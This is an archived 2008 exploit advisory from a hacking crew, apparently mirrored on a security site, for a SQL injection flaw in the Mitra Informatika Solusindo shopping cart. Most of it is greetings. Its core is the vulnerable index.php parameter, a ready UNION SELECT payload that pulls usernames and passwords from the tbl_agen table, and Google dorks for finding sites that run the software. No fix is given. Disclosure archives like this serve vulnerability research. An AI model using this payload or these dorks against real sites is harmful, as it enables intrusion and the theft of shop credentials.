Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19339
HistoryMar 05, 2008 - 12:00 a.m.

SolpotCrew Advisory #16 - Mitra Informatika Solusindo cart Remote Sql Injection Exploit

2008-03-0500:00:00
vulners.com
68

#############################SolpotCrew
Community################################

Mitra Informatika Solusindo cart Remote Sql

Injection Exploit

vendor : http://www.mitrainformatika.com/

#################################################################################

Bug Found By : home_edition2001 a.k.a (bius)

(4-03-2008)

contact: [email protected]

Website :

www.solpotcrew.org/adv/home_edition2001-adv-03.txt

################################################################################

Greetz: NYUBI,h4ntu,Ibnusina , Sikodoq ,

ghareng , Saritem ,Ingin_belajar

pannel , Matdhule , Naruto ,

d\i\c\k\y , ASP , Roney , live

kabut , Portrait , huhuhu , geronimo

, Bolis ,HearTBreaK

Blue|spy , X8 , dead , ZDe , K1tk4t ,

webmaster

x-ace , ardan , th3sn0wbr4in ,

BrainDrain

and all member solpotcrew community

http://www.solpotcrew.org/forum/

#nyubicrew @ irc.mildnet.cn

especially thx to str0ke @ milw0rm.com

###############################################################################

Exploit in:

/index.php?c=10&p=-7(SQL)

Example:

(SQL)%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen–
############################################################################

google dork : Powered by Mitra Informatika Solusindo
Mitra Informatika Solusindo cart
intitle:'Mitra Informatika Solusindo'
Shopingcart System

##############################MY LOVE JUST FOR U
Dina Mariance#########################
######################################E.O.F##################################